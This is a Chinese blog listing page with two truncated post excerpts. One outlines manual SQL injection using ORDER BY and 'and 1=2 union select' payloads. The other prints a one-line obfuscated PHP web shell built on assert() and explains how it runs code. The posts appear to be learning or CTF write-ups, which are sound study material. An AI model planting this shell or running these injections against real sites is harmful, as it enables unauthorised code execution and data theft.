Fork me on GitHub
摘要: 还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL 阅读全文
posted @ 2019-01-21 23:00 Jaxjones 阅读(3125) 评论(0) 推荐(0) 编辑
摘要: <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[ 阅读全文
posted @ 2019-01-21 21:23 Jaxjones 阅读(599) 评论(0) 推荐(0) 编辑